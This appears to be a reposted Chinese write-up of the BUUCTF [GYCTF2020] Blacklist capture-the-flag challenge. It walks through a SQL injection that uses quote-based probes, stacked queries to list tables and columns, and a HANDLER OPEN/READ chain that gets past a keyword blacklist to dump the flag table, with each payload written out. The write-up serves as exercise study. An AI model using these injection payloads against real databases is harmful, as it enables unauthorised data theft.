BUUCTF[GYCTF2020]Blacklist
Posted 王小帥
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BUUCTF[GYCTF2020]Blacklist相关的知识,希望对你有一定的参考价值。
sql注入题型,测试发现黑名单如下:
大小写,双写,编码均不可绕过。
可用的还有,or and union show
输入:1 or 1=1 无反应
输入:1' or '1' ='1 如下:
字符型注入,由于show可用,所以我们想到堆叠注入:
1';show tables;
查看字段名,
1';show columns from FlagHere;
过滤机制过于强大,所以我们使用handler,
HANDLER...OPEN语句打开一个表,使其可以使用后续HANDLER … READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER … CLOSE或会话终止之前不会关闭。
1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#
打开FlagHere表,读取第一个,然后关闭会话。
思路:黑名单过滤,show可用,想到使用堆叠注入,知道flag在FlagHere表中之后,使用 handler 读取flag。
以上是关于BUUCTF[GYCTF2020]Blacklist的主要内容,如果未能解决你的问题,请参考以下文章